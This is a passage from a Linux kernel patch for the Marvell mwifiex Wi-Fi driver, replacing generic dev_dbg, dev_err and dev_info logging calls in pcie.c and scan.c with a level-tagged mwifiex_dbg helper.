mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) } if (memory_size == 0) { - dev_info(adapter->dev, "Firmware dump Finished!\n"); + mwifiex_dbg(adapter, MSG, "Firmware dump Finished!\n"); ret = mwifiex_write_reg(adapter, creg->fw_dump_ctrl, FW_DUMP_READ_DONE); if (ret) { - dev_err(adapter->dev, "PCIE write err\n"); + mwifiex_dbg(adapter, ERROR, "PCIE write err\n"); goto done; } break; } - dev_info(adapter->dev, - "%s_SIZE=0x%x\n", entry->mem_name, memory_size); + mwifiex_dbg(adapter, DUMP, + "%s_SIZE=0x%x\n", entry->mem_name, memory_size); entry->mem_ptr = vmalloc(memory_size + 1); entry->mem_size = memory_size; if (!entry->mem_ptr) { - dev_err(adapter->dev, - "Vmalloc %s failed\n", entry->mem_name); + mwifiex_dbg(adapter, ERROR, + "Vmalloc %s failed\n", entry->mem_name); goto done; } dbg_ptr = entry->mem_ptr; end_ptr = dbg_ptr + memory_size; doneflag = entry->done_flag; - dev_info(adapter->dev, "Start %s output, please wait...\n", - entry->mem_name); + mwifiex_dbg(adapter, DUMP, "Start %s output, please wait...\n", + entry->mem_name); do { stat = mwifiex_pcie_rdwr_firmware(adapter, doneflag); @@ -2349,8 +2394,8 @@ static void mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) if (dbg_ptr < end_ptr) { dbg_ptr++; } else { - dev_err(adapter->dev, - "Allocated buf not enough\n"); + mwifiex_dbg(adapter, ERROR, + "Allocated buf not enough\n"); goto done; } } @@ -2358,12 +2403,13 @@ static void mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) if (stat != RDWR_STATUS_DONE) continue; - dev_info(adapter->dev, "%s done: size=0x%tx\n", - entry->mem_name, dbg_ptr - entry->mem_ptr); + mwifiex_dbg(adapter, DUMP, + "%s done: size=0x%tx\n", + entry->mem_name, dbg_ptr - entry->mem_ptr); break; } while (true); } - dev_info(adapter->dev, "== mwifiex firmware dump end ==\n"); + mwifiex_dbg(adapter, MSG, "== mwifiex firmware dump end ==\n"); kobject_uevent_env(&adapter->wiphy->dev.kobj, KOBJ_CHANGE, env); @@ -2418,45 +2464,50 @@ static int mwifiex_pcie_init(struct mwifiex_adapter *adapter) pci_set_master(pdev); - dev_dbg(adapter->dev, "try set_consistent_dma_mask(32)\n"); + mwifiex_dbg(adapter, INFO, + "try set_consistent_dma_mask(32)\n"); ret = pci_set_dma_mask(pdev, DMA_BIT_MASK(32)); if (ret) { - dev_err(adapter->dev, "set_dma_mask(32) failed\n"); + mwifiex_dbg(adapter, ERROR, + "set_dma_mask(32) failed\n"); goto err_set_dma_mask; } ret = pci_set_consistent_dma_mask(pdev, DMA_BIT_MASK(32)); if (ret) { - dev_err(adapter->dev, "set_consistent_dma_mask(64) failed\n"); + mwifiex_dbg(adapter, ERROR, + "set_consistent_dma_mask(64) failed\n"); goto err_set_dma_mask; } ret = pci_request_region(pdev, 0, DRV_NAME); if (ret) { - dev_err(adapter->dev, "req_reg(0) error\n"); + mwifiex_dbg(adapter, ERROR, + "req_reg(0) error\n"); goto err_req_region0; } card->pci_mmap = pci_iomap(pdev, 0, 0); if (!card->pci_mmap) { - dev_err(adapter->dev, "iomap(0) error\n"); + mwifiex_dbg(adapter, ERROR, "iomap(0) error\n"); ret = -EIO; goto err_iomap0; } ret = pci_request_region(pdev, 2, DRV_NAME); if (ret) { - dev_err(adapter->dev, "req_reg(2) error\n"); + mwifiex_dbg(adapter, ERROR, "req_reg(2) error\n"); goto err_req_region2; } card->pci_mmap1 = pci_iomap(pdev, 2, 0); if (!card->pci_mmap1) { - dev_err(adapter->dev, "iomap(2) error\n"); + mwifiex_dbg(adapter, ERROR, + "iomap(2) error\n"); ret = -EIO; goto err_iomap2; } - dev_dbg(adapter->dev, - "PCI memory map Virt0: %p PCI memory map Virt2: %p\n", - card->pci_mmap, card->pci_mmap1); + mwifiex_dbg(adapter, INFO, + "PCI memory map Virt0: %p PCI memory map Virt2: %p\n", + card->pci_mmap, card->pci_mmap1); card->cmdrsp_buf = NULL; ret = mwifiex_pcie_create_txbd_ring(adapter); @@ -2521,10 +2572,11 @@ static void mwifiex_pcie_cleanup(struct mwifiex_adapter *adapter) const struct mwifiex_pcie_card_reg *reg = card->pcie.reg; if (user_rmmod) { - dev_dbg(adapter->dev, "Clearing driver ready signature\n"); + mwifiex_dbg(adapter, INFO, + "Clearing driver ready signature\n"); if (mwifiex_write_reg(adapter, reg->drv_rdy, 0x00000000)) - dev_err(adapter->dev, - "Failed to write driver not-ready signature\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to write driver not-ready signature\n"); } if (pdev) { @@ -2555,7 +2607,8 @@ static int mwifiex_register_dev(struct mwifiex_adapter *adapter) ret = request_irq(pdev->irq, mwifiex_pcie_interrupt, IRQF_SHARED, "MRVL_PCIE", pdev); if (ret) { - pr_err("request_irq failed: ret=%d\n", ret); + mwifiex_dbg(adapter, ERROR, + "request_irq failed: ret=%d\n", ret); adapter->card = NULL; return -1; } @@ -2582,7 +2635,8 @@ static void mwifiex_unregister_dev(struct mwifiex_adapter *adapter) const struct mwifiex_pcie_card_reg *reg; if (card) { - dev_dbg(adapter->dev, "%s(): calling free_irq()\n", __func__); + mwifiex_dbg(adapter, INFO, + "%s(): calling free_irq()\n", __func__); free_irq(card->dev->irq, card->dev); reg = card->pcie.reg; diff --git a/drivers/net/wireless/mwifiex/scan.c b/drivers/net/wireless/mwifiex/scan.c index 84843d1b0a04..baf9715ddc10 100644 --- a/drivers/net/wireless/mwifiex/scan.c +++ b/drivers/net/wireless/mwifiex/scan.c @@ -241,20 +241,21 @@ mwifiex_is_bss_wpa(struct mwifiex_private *priv, * LinkSys WRT54G && bss_desc->privacy */ ) { - dev_dbg(priv->adapter->dev, "info: %s: WPA:" - " wpa_ie=%#x wpa2_ie=%#x WEP=%s WPA=%s WPA2=%s " - "EncMode=%#x privacy=%#x\n", __func__, - (bss_desc->bcn_wpa_ie) ? - (*(bss_desc->bcn_wpa_ie)). - vend_hdr.element_id : 0, - (bss_desc->bcn_rsn_ie) ? - (*(bss_desc->bcn_rsn_ie)). - ieee_hdr.element_id : 0, - (priv->sec_info.wep_enabled) ? "e" : "d", - (priv->sec_info.wpa_enabled) ? "e" : "d", - (priv->sec_info.wpa2_enabled) ? "e" : "d", - priv->sec_info.encryption_mode, - bss_desc->privacy); + mwifiex_dbg(priv->adapter, INFO, + "info: %s: WPA:\t" + "wpa_ie=%#x wpa2_ie=%#x WEP=%s WPA=%s WPA2=%s\t" + "EncMode=%#x privacy=%#x\n", __func__, + (bss_desc->bcn_wpa_ie) ? + (*bss_desc->bcn_wpa_ie). + vend_hdr.element_id : 0, + (bss_desc->bcn_rsn_ie) ? + (*bss_desc->bcn_rsn_ie). + ieee_hdr.element_id : 0, + (priv->sec_info.wep_enabled) ? "e" : "d", + (priv->sec_info.wpa_enabled) ? "e" : "d", + (priv->sec_info.wpa2_enabled) ? "e" : "d", + priv->sec_info.encryption_mode, + bss_desc->privacy); return true; } return false; @@ -277,20 +278,21 @@ mwifiex_is_bss_wpa2(struct mwifiex_private *priv, * Privacy bit may NOT be set in some APs like * LinkSys WRT54G && bss_desc->privacy */ - dev_dbg(priv->adapter->dev, "info: %s: WPA2: " - " wpa_ie=%#x wpa2_ie=%#x WEP=%s WPA=%s WPA2=%s " - "EncMode=%#x privacy=%#x\n", __func__, - (bss_desc->bcn_wpa_ie) ? - (*(bss_desc->bcn_wpa_ie)). - vend_hdr.element_id : 0, - (bss_desc->bcn_rsn_ie) ? - (*(bss_desc->bcn_rsn_ie)). - ieee_hdr.element_id : 0, - (priv->sec_info.wep_enabled) ? "e" : "d", - (priv->sec_info.wpa_enabled) ? "e" : "d", - (priv->sec_info.wpa2_enabled) ? "e" : "d", - priv->sec_info.encryption_mode, - bss_desc->privacy); + mwifiex_dbg(priv->adapter, INFO, + "info: %s: WPA2:\t" + "wpa_ie=%#x wpa2_ie=%#x WEP=%s WPA=%s WPA2=%s\t" + "EncMode=%#x privacy=%#x\n", __func__, + (bss_desc->bcn_wpa_ie) ? + (*bss_desc->bcn_wpa_ie). + vend_hdr.element_id : 0, + (bss_desc->bcn_rsn_ie) ? + (*bss_desc->bcn_rsn_ie). + ieee_hdr.element_id : 0, + (priv->sec_info.wep_enabled) ? "e" : "d", + (priv->sec_info.wpa_enabled) ? "e" : "d", + (priv->sec_info.wpa2_enabled) ? "e" : "d", + priv->sec_info.encryption_mode, + bss_desc->privacy); return true; } return false; @@ -333,18 +335,19 @@ mwifiex_is_bss_dynamic_wep(struct mwifiex_private *priv, ((!bss_desc->bcn_rsn_ie) || ((*(bss_desc->bcn_rsn_ie)).ieee_hdr.element_id != WLAN_EID_RSN)) && priv->sec_info.encryption_mode && bss_desc->privacy) { - dev_dbg(priv->adapter->dev, "info: %s: dynamic " - "WEP: wpa_ie=%#x wpa2_ie=%#x " - "EncMode=%#x privacy=%#x\n", - __func__, - (bss_desc->bcn_wpa_ie) ? - (*(bss_desc->bcn_wpa_ie)). - vend_hdr.element_id : 0, - (bss_desc->bcn_rsn_ie) ? - (*(bss_desc->bcn_rsn_ie)). - ieee_hdr.element_id : 0, - priv->sec_info.encryption_mode, - bss_desc->privacy); + mwifiex_dbg(priv->adapter, INFO, + "info: %s: dynamic\t" + "WEP: wpa_ie=%#x wpa2_ie=%#x\t" + "EncMode=%#x privacy=%#x\n", + __func__, + (bss_desc->bcn_wpa_ie) ? + (*bss_desc->bcn_wpa_ie). + vend_hdr.element_id : 0, + (bss_desc->bcn_rsn_ie) ? + (*bss_desc->bcn_rsn_ie). + ieee_hdr.element_id : 0, + priv->sec_info.encryption_mode, + bss_desc->privacy); return true; } return false; @@ -383,19 +386,20 @@ mwifiex_is_network_compatible(struct mwifiex_private *priv, return 0; if (priv->wps.session_enable) { - dev_dbg(adapter->dev, - "info: return success directly in WPS period\n"); + mwifiex_dbg(adapter, IOCTL, + "info: return success directly in WPS period\n"); return 0; } if (bss_desc->chan_sw_ie_present) { - dev_err(adapter->dev, - "Don't connect to AP with WLAN_EID_CHANNEL_SWITCH\n"); + mwifiex_dbg(adapter, INFO, + "Don't connect to AP with WLAN_EID_CHANNEL_SWITCH\n"); return -1; } if (mwifiex_is_bss_wapi(priv, bss_desc)) { - dev_dbg(adapter->dev, "info: return success for WAPI AP\n"); + mwifiex_dbg(adapter, INFO, + "info: return success for WAPI AP\n"); return 0; } @@ -405,7 +409,8 @@ mwifiex_is_network_compatible(struct mwifiex_private *priv, return 0; } else if (mwifiex_is_bss_static_wep(priv, bss_desc)) { /* Static WEP enabled */ - dev_dbg(adapter->dev, "info: Disable 11n in WEP mode.\n"); + mwifiex_dbg(adapter, INFO, + "info: Disable 11n in WEP mode.\n"); bss_desc->disable_11n = true; return 0; } else if (mwifiex_is_bss_wpa(priv, bss_desc)) { @@ -418,9 +423,9 @@ mwifiex_is_network_compatible(struct mwifiex_private *priv, if (mwifiex_is_wpa_oui_present (bss_desc, CIPHER_SUITE_TKIP)) { - dev_dbg(adapter->dev, - "info: Disable 11n if AES " - "is not supported by AP\n"); + mwifiex_dbg(adapter, INFO, + "info: Disable 11n if AES\t" + "is not supported by AP\n"); bss_desc->disable_11n = true; } else { return -1; @@ -437,9 +442,9 @@ mwifiex_is_network_compatible(struct mwifiex_private *priv, if (mwifiex_is_rsn_oui_present (bss_desc, CIPHER_SUITE_TKIP)) { - dev_dbg(adapter->dev, - "info: Disable 11n if AES " - "is not supported by AP\n"); + mwifiex_dbg(adapter, INFO, + "info: Disable 11n if AES\t" + "is not supported by AP\n"); bss_desc->disable_11n = true; } else { return -1; @@ -455,17 +460,18 @@ mwifiex_is_network_compatible(struct mwifiex_private *priv, } /* Security doesn't match */ - dev_dbg(adapter->dev, - "info: %s: failed: wpa_ie=%#x wpa2_ie=%#x WEP=%s " - "WPA=%s WPA2=%s EncMode=%#x privacy=%#x\n", __func__, - (bss_desc->bcn_wpa_ie) ? - (*(bss_desc->bcn_wpa_ie)).vend_hdr.element_id : 0, - (bss_desc->bcn_rsn_ie) ? - (*(bss_desc->bcn_rsn_ie)).ieee_hdr.element_id : 0, - (priv->sec_info.wep_enabled) ? "e" : "d", - (priv->sec_info.wpa_enabled) ? "e" : "d", - (priv->sec_info.wpa2_enabled) ? "e" : "d", - priv->sec_info.encryption_mode, bss_desc->privacy); + mwifiex_dbg(adapter, ERROR, + "info: %s: failed: wpa_ie=%#x wpa2_ie=%#x WEP=%s\t" + "WPA=%s WPA2=%s EncMode=%#x privacy=%#x\n", + __func__, + (bss_desc->bcn_wpa_ie) ? + (*bss_desc->bcn_wpa_ie).vend_hdr.element_id : 0, + (bss_desc->bcn_rsn_ie) ? + (*bss_desc->bcn_rsn_ie).ieee_hdr.element_id : 0, + (priv->sec_info.wep_enabled) ? "e" : "d", + (priv->sec_info.wpa_enabled) ? "e" : "d", + (priv->sec_info.wpa2_enabled) ? "e" : "d", + priv->sec_info.encryption_mode, bss_desc->privacy); return -1; } @@ -560,7 +566,8 @@ mwifiex_append_rate_tlv(struct mwifiex_private *priv, else rates_size = mwifiex_get_supported_rates(priv, rates); - dev_dbg(priv->adapter->dev, "info: SCAN_CMD: Rates size = %d\n", + mwifiex_dbg(priv->adapter, CMD, + "info: SCAN_CMD: Rates size = %d\n", rates_size); rates_tlv = (struct mwifiex_ie_types_rates_param_set *)tlv_pos; rates_tlv->header.type = cpu_to_le16(WLAN_EID_SUPP_RATES); @@ -600,9 +607,9 @@ mwifiex_scan_channel_list(struct mwifiex_private *priv, u8 radio_type; if (!scan_cfg_out || !chan_tlv_out || !scan_chan_list) { - dev_dbg(priv->adapter->dev, - "info: Scan: Null detect: %p, %p, %p\n", - scan_cfg_out, chan_tlv_out, scan_chan_list); + mwifiex_dbg(priv->adapter, ERROR, + "info: Scan: Null detect: %p, %p, %p\n", + scan_cfg_out, chan_tlv_out, scan_chan_list); return -1; } @@ -645,16 +652,16 @@ mwifiex_scan_channel_list(struct mwifiex_private *priv, } radio_type = tmp_chan_list->radio_type; - dev_dbg(priv->adapter->dev, - "info: Scan: Chan(%3d), Radio(%d)," - " Mode(%d, %d), Dur(%d)\n", - tmp_chan_list->chan_number, - tmp_chan_list->radio_type, - tmp_chan_list->chan_scan_mode_bitmap - & MWIFIEX_PASSIVE_SCAN, - (tmp_chan_list->chan_scan_mode_bitmap - & MWIFIEX_DISABLE_CHAN_FILT) >> 1, - le16_to_cpu(tmp_chan_list->max_scan_time)); + mwifiex_dbg(priv->adapter, INFO, + "info: Scan: Chan(%3d), Radio(%d),\t" + "Mode(%d, %d), Dur(%d)\n", + tmp_chan_list->chan_number, + tmp_chan_list->radio_type, + tmp_chan_list->chan_scan_mode_bitmap + & MWIFIEX_PASSIVE_SCAN, + (tmp_chan_list->chan_scan_mode_bitmap + & MWIFIEX_DISABLE_CHAN_FILT) >> 1, + le16_to_cpu(tmp_chan_list->max_scan_time)); /* Copy the current channel TLV to the command being prepared */ @@ -718,9 +725,11 @@ mwifiex_scan_channel_list(struct mwifiex_private *priv, /* The total scan time should be less than scan command timeout value */ if (total_scan_time > MWIFIEX_MAX_TOTAL_SCAN_TIME) { - dev_err(priv->adapter->dev, "total scan time %dms" - " is over limit (%dms), scan skipped\n", - total_scan_time, MWIFIEX_MAX_TOTAL_SCAN_TIME); + mwifiex_dbg(priv->adapter, ERROR, + "total scan time %dms\t" + "is over limit (%dms), scan skipped\n", + total_scan_time, + MWIFIEX_MAX_TOTAL_SCAN_TIME); ret = -1; break; } @@ -905,9 +914,10 @@ mwifiex_config_scan(struct mwifiex_private *priv, tlv_pos += (sizeof(wildcard_ssid_tlv->header) + le16_to_cpu(wildcard_ssid_tlv->header.len)); - dev_dbg(adapter->dev, "info: scan: ssid[%d]: %s, %d\n", - i, wildcard_ssid_tlv->ssid, - wildcard_ssid_tlv->max_ssid_length); + mwifiex_dbg(adapter, INFO, + "info: scan: ssid[%d]: %s, %d\n", + i, wildcard_ssid_tlv->ssid, + wildcard_ssid_tlv->max_ssid_length); /* Empty wildcard ssid with a maxlen will match many or potentially all SSIDs (maxlen == 32), therefore do @@ -928,8 +938,9 @@ mwifiex_config_scan(struct mwifiex_private *priv, *filtered_scan = true; if (user_scan_in->scan_chan_gap) { - dev_dbg(adapter->dev, "info: scan: channel gap = %d\n", - user_scan_in->scan_chan_gap); + mwifiex_dbg(adapter, INFO, + "info: scan: channel gap = %d\n", + user_scan_in->scan_chan_gap); *max_chan_per_scan = MWIFIEX_MAX_CHANNELS_PER_SPECIFIC_SCAN; @@ -961,8 +972,9 @@ mwifiex_config_scan(struct mwifiex_private *priv, add tlv */ if (num_probes) { - dev_dbg(adapter->dev, "info: scan: num_probes = %d\n", - num_probes); + mwifiex_dbg(adapter, INFO, + "info: scan: num_probes = %d\n", + num_probes); num_probes_tlv = (struct mwifiex_ie_types_num_probes *) tlv_pos; num_probes_tlv->header.type = cpu_to_le16(TLV_TYPE_NUMPROBES); @@ -1003,7 +1015,8 @@ mwifiex_config_scan(struct mwifiex_private *priv, if (user_scan_in && user_scan_in->chan_list[0].chan_number) { - dev_dbg(adapter->dev, "info: Scan: Using supplied channel list\n"); + mwifiex_dbg(adapter, INFO, + "info: Scan: Using supplied channel list\n"); for (chan_idx = 0; chan_idx < MWIFIEX_USER_SCAN_CHAN_MAX && @@ -1056,13 +1069,13 @@ mwifiex_config_scan(struct mwifiex_private *priv, (user_scan_in->chan_list[0].chan_number == priv->curr_bss_params.bss_descriptor.channel)) { *scan_current_only = true; - dev_dbg(adapter->dev, - "info: Scan: Scanning current channel only\n"); + mwifiex_dbg(adapter, INFO, + "info: Scan: Scanning current channel only\n"); } chan_num = chan_idx; } else { - dev_dbg(adapter->dev, - "info: Scan: Creating full region channel list\n"); + mwifiex_dbg(adapter, INFO, + "info: Scan: Creating full region channel list\n"); chan_num = mwifiex_scan_create_channel_list(priv, user_scan_in, scan_chan_list, *filtered_scan); @@ -1094,8 +1107,9 @@ mwifiex_ret_802_11_scan_get_tlv_ptrs(struct mwifiex_adapter *adapter, tlv_buf_left = tlv_buf_size; *tlv_data = NULL; - dev_dbg(adapter->dev, "info: SCAN_RESP: tlv_buf_size = %d\n", - tlv_buf_size); + mwifiex_dbg(adapter, INFO, + "info: SCAN_RESP: tlv_buf_size = %d\n", + tlv_buf_size); while (tlv_buf_left >= sizeof(struct mwifiex_ie_types_header)) { @@ -1103,26 +1117,31 @@ mwifiex_ret_802_11_scan_get_tlv_ptrs(struct mwifiex_adapter *adapter, tlv_len = le16_to_cpu(current_tlv->header.len); if (sizeof(tlv->header) + tlv_len > tlv_buf_left) { - dev_err(adapter->dev, "SCAN_RESP: TLV buffer corrupt\n"); + mwifiex_dbg(adapter, ERROR, + "SCAN_RESP: TLV buffer corrupt\n"); break; } if (req_tlv_type == tlv_type) { switch (tlv_type) { case TLV_TYPE_TSFTIMESTAMP: - dev_dbg(adapter->dev, "info: SCAN_RESP: TSF " - "timestamp TLV, len = %d\n", tlv_len); + mwifiex_dbg(adapter, INFO, + "info: SCAN_RESP: TSF\t" + "timestamp TLV, len = %d\n", + tlv_len); *tlv_data = current_tlv; break; case TLV_TYPE_CHANNELBANDLIST: - dev_dbg(adapter->dev, "info: SCAN_RESP: channel" - " band list TLV, len = %d\n", tlv_len); + mwifiex_dbg(adapter, INFO, + "info: SCAN_RESP: channel\t" + "band list TLV, len = %d\n", + tlv_len); *tlv_data = current_tlv; break; default: - dev_err(adapter->dev, - "SCAN_RESP: unhandled TLV = %d\n", - tlv_type); + mwifiex_dbg(adapter, ERROR, + "SCAN_RESP: unhandled TLV = %d\n", + tlv_type); /* Give up, this seems corrupted */ return; } @@ -1177,8 +1196,9 @@ int mwifiex_update_bss_desc_with_ie(struct mwifiex_adapter *adapter, total_ie_len = element_len + sizeof(struct ieee_types_header); if (bytes_left < total_ie_len) { - dev_err(adapter->dev, "err: InterpretIE: in processing" - " IE, bytes left < IE length\n"); + mwifiex_dbg(adapter, ERROR, + "err: InterpretIE: in processing\t" + "IE, bytes left < IE length\n"); return -1; } switch (element_id) { @@ -1186,9 +1206,9 @@ int mwifiex_update_bss_desc_with_ie(struct mwifiex_adapter *adapter, bss_entry->ssid.ssid_len = element_len; memcpy(bss_entry->ssid.ssid, (current_ptr + 2), element_len); - dev_dbg(adapter->dev, - "info: InterpretIE: ssid: %-32s\n", - bss_entry->ssid.ssid); + mwifiex_dbg(adapter, INFO, + "info: InterpretIE: ssid: %-32s\n", + bss_entry->ssid.ssid); break; case WLAN_EID_SUPP_RATES: @@ -1419,19 +1439,20 @@ int mwifiex_scan_networks(struct mwifiex_private *priv, unsigned long flags; if (adapter->scan_processing) { - dev_err(adapter->dev, "cmd: Scan already in process...\n"); + mwifiex_dbg(adapter, WARN, + "cmd: Scan already in process...\n"); return -EBUSY; } if (priv->scan_block) { - dev_err(adapter->dev, - "cmd: Scan is blocked during association...\n"); + mwifiex_dbg(adapter, WARN, + "cmd: Scan is blocked during association...\n"); return -EBUSY; } if (adapter->surprise_removed || adapter->is_cmd_timedout) { - dev_err(adapter->dev, - "Ignore scan. Card removed or firmware in bad state\n"); + mwifiex_dbg(adapter, ERROR, + "Ignore scan. Card removed or firmware in bad state\n"); return -EFAULT; } @@ -1478,7 +1499,8 @@ int mwifiex_scan_networks(struct mwifiex_private *priv, /* Perform internal scan synchronously */ if (!priv->scan_request) { - dev_dbg(adapter->dev, "wait internal scan\n"); + mwifiex_dbg(adapter, INFO, + "wait internal scan\n"); mwifiex_wait_queue_complete(adapter, cmd_node); } } else { @@ -1553,8 +1575,8 @@ int mwifiex_check_network_compatibility(struct mwifiex_private *priv, ret = mwifiex_is_network_compatible(priv, bss_desc, priv->bss_mode); if (ret) - dev_err(priv->adapter->dev, - "Incompatible network settings\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Incompatible network settings\n"); break; default: ret = 0; @@ -1656,7 +1678,8 @@ mwifiex_parse_single_response_buf(struct mwifiex_private *priv, u8 **bss_info, */ if (curr_bcn_bytes < ETH_ALEN + sizeof(u8) + sizeof(struct mwifiex_fixed_bcn_param)) { - dev_err(adapter->dev, "InterpretIE: not enough bytes left\n"); + mwifiex_dbg(adapter, ERROR, + "InterpretIE: not enough bytes left\n"); return -EFAULT; } @@ -1669,7 +1692,8 @@ mwifiex_parse_single_response_buf(struct mwifiex_private *priv, u8 **bss_info, rssi = (-rssi) * 100; /* Convert dBm to mBm */ current_ptr += sizeof(u8); curr_bcn_bytes -= sizeof(u8); - dev_dbg(adapter->dev, "info: InterpretIE: RSSI=%d\n", rssi); + mwifiex_dbg(adapter, INFO, + "info: InterpretIE: RSSI=%d\n", rssi); } else { rssi = rssi_val; } @@ -1682,14 +1706,16 @@ mwifiex_parse_single_response_buf(struct mwifiex_private *priv, u8 **bss_info, beacon_period = le16_to_cpu(bcn_param->beacon_period); cap_info_bitmap = le16_to_cpu(bcn_param->cap_info_bitmap); - dev_dbg(adapter->dev, "info: InterpretIE: capabilities=0x%X\n", - cap_info_bitmap); + mwifiex_dbg(adapter, INFO, + "info: InterpretIE: capabilities=0x%X\n", + cap_info_bitmap); /* Rest of the current buffer are IE's */ ie_buf = current_ptr; ie_len = curr_bcn_bytes; - dev_dbg(adapter->dev, "info: InterpretIE: IELength for this AP = %d\n", - curr_bcn_bytes); + mwifiex_dbg(adapter, INFO, + "info: InterpretIE: IELength for this AP = %d\n", + curr_bcn_bytes); while (curr_bcn_bytes >= sizeof(struct ieee_types_header)) { u8 element_id, element_len; @@ -1698,8 +1724,8 @@ mwifiex_parse_single_response_buf(struct mwifiex_private *priv, u8 **bss_info, element_len = *(current_ptr + 1); if (curr_bcn_bytes < element_len + sizeof(struct ieee_types_header)) { - dev_err(adapter->dev, - "%s: bytes left < IE length\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: bytes left < IE length\n", __func__); return -EFAULT; } if (element_id == WLAN_EID_DS_PARAMS) { @@ -1719,8 +1745,8 @@ mwifiex_parse_single_response_buf(struct mwifiex_private *priv, u8 **bss_info, /* Skip entry if on csa closed channel */ if (channel == priv->csa_chan) { - dev_dbg(adapter->dev, - "Dropping entry on csa closed channel\n"); + mwifiex_dbg(adapter, WARN, + "Dropping entry on csa closed channel\n"); return 0; } @@ -1751,7 +1777,7 @@ mwifiex_parse_single_response_buf(struct mwifiex_private *priv, u8 **bss_info, cfg80211_put_bss(priv->wdev.wiphy, bss); } } else { - dev_dbg(adapter->dev, "missing BSS channel IE\n"); + mwifiex_dbg(adapter, WARN, "missing BSS channel IE\n"); } return 0; @@ -1765,7 +1791,8 @@ static void mwifiex_complete_scan(struct mwifiex_private *priv) if (adapter->curr_cmd->wait_q_enabled) { adapter->cmd_wait_q.status = 0; if (!priv->scan_request) { - dev_dbg(adapter->dev, "complete internal scan\n"); + mwifiex_dbg(adapter, INFO, + "complete internal scan\n"); mwifiex_complete_cmd(adapter, adapter->curr_cmd); } } @@ -1788,12 +1815,14 @@ static void mwifiex_check_next_scan_command(struct mwifiex_private *priv) mwifiex_complete_scan(priv); if (priv->scan_request) { - dev_dbg(adapter->dev, "info: notifying scan done\n"); + mwifiex_dbg(adapter, INFO, + "info: notifying scan done\n"); cfg80211_scan_done(priv->scan_request, 0); priv->scan_request = NULL; } else { priv->scan_aborting = false; - dev_dbg(adapter->dev, "info: scan already aborted\n"); + mwifiex_dbg(adapter, INFO, + "info: scan already aborted\n"); } } else if ((priv->scan_aborting && !priv->scan_request) || priv->scan_block) { @@ -1809,12 +1838,14 @@ static void mwifiex_check_next_scan_command(struct mwifiex_private *priv) spin_unlock_irqrestore(&adapter->mwifiex_cmd_lock, flags); if (priv->scan_request) { - dev_dbg(adapter->dev, "info: aborting scan\n"); + mwifiex_dbg(adapter, INFO, + "info: aborting scan\n"); cfg80211_scan_done(priv->scan_request, 1); priv->scan_request = NULL; } else { priv->scan_aborting = false; - dev_dbg(adapter->dev, "info: scan already aborted\n"); + mwifiex_dbg(adapter, INFO, + "info: scan already aborted\n"); } } else { /* Get scan command from scan_pending_q and put to @@ -1877,8 +1908,9 @@ int mwifiex_ret_802_11_scan(struct mwifiex_private *priv, if (scan_rsp->number_of_sets > MWIFIEX_MAX_AP) { - dev_err(adapter->dev, "SCAN_RESP: too many AP returned (%d)\n", - scan_rsp->number_of_sets); + mwifiex_dbg(adapter, ERROR, + "SCAN_RESP: too many AP returned (%d)\n", + scan_rsp->number_of_sets); ret = -1; goto check_next_scan; } @@ -1887,14 +1919,15 @@ int mwifiex_ret_802_11_scan(struct mwifiex_private *priv, mwifiex_11h_get_csa_closed_channel(priv); bytes_left = le16_to_cpu(scan_rsp->bss_descript_size); - dev_dbg(adapter->dev, "info: SCAN_RESP: bss_descript_size %d\n", - bytes_left); + mwifiex_dbg(adapter, INFO, + "info: SCAN_RESP: bss_descript_size %d\n", + bytes_left); scan_resp_size = le16_to_cpu(resp->size); - dev_dbg(adapter->dev, - "info: SCAN_RESP: returned %d APs before parsing\n", - scan_rsp->number_of_sets); + mwifiex_dbg(adapter, INFO, + "info: SCAN_RESP: returned %d APs before parsing\n", + scan_rsp->number_of_sets); bss_info = scan_rsp->bss_desc_and_tlv_buffer; @@ -2007,13 +2040,13 @@ mwifiex_update_chan_statistics(struct mwifiex_private *priv, le16_to_cpu(fw_chan_stats->cca_scan_dur); chan_stats.cca_busy_dur = le16_to_cpu(fw_chan_stats->cca_busy_dur); - dev_dbg(adapter->dev, - "chan=%d, noise=%d, total_network=%d scan_duration=%d, busy_duration=%d\n", - chan_stats.chan_num, - chan_stats.noise, - chan_stats.total_bss, - chan_stats.cca_scan_dur, - chan_stats.cca_busy_dur); + mwifiex_dbg(adapter, INFO, + "chan=%d, noise=%d, total_network=%d scan_duration=%d, busy_duration=%d\n", + chan_stats.chan_num, + chan_stats.noise, + chan_stats.total_bss, + chan_stats.cca_scan_dur, + chan_stats.cca_busy_dur); memcpy(&adapter->chan_stats[adapter->survey_idx++], &chan_stats, sizeof(struct mwifiex_chan_stats)); fw_chan_stats++; @@ -2035,7 +2068,7 @@ int mwifiex_ret_802_11_scan_ext(struct mwifiex_private *priv, unsigned long cmd_flags, scan_flags; bool complete_scan = false; - dev_dbg(priv->adapter->dev, "info: EXT scan returns successfully\n"); + mwifiex_dbg(adapter, INFO, "info: EXT scan returns successfully\n"); ext_scan_resp = &resp->params.ext_scan; @@ -2048,8 +2081,8 @@ int mwifiex_ret_802_11_scan_ext(struct mwifiex_private *priv, len = le16_to_cpu(tlv->len); if (buf_left < (sizeof(struct mwifiex_ie_types_header) + len)) { - dev_err(adapter->dev, - "error processing scan response TLVs"); + mwifiex_dbg(adapter, ERROR, + "error processing scan response TLVs"); break; } @@ -2075,8 +2108,8 @@ int mwifiex_ret_802_11_scan_ext(struct mwifiex_private *priv, cmd_ptr = (void *)cmd_node->cmd_skb->data; if (le16_to_cpu(cmd_ptr->command) == HostCmd_CMD_802_11_SCAN_EXT) { - dev_dbg(priv->adapter->dev, - "Scan pending in command pending list"); + mwifiex_dbg(adapter, INFO, + "Scan pending in command pending list"); complete_scan = false; break; } @@ -2114,17 +2147,17 @@ int mwifiex_handle_event_ext_scan_report(struct mwifiex_private *priv, u16 scan_resp_size = le16_to_cpu(event_scan->buf_size); if (num_of_set > MWIFIEX_MAX_AP) { - dev_err(adapter->dev, - "EXT_SCAN: Invalid number of AP returned (%d)!!\n", - num_of_set); + mwifiex_dbg(adapter, ERROR, + "EXT_SCAN: Invalid number of AP returned (%d)!!\n", + num_of_set); ret = -1; goto check_next_scan; } bytes_left = scan_resp_size; - dev_dbg(adapter->dev, - "EXT_SCAN: size %d, returned %d APs...", - scan_resp_size, num_of_set); + mwifiex_dbg(adapter, INFO, + "EXT_SCAN: size 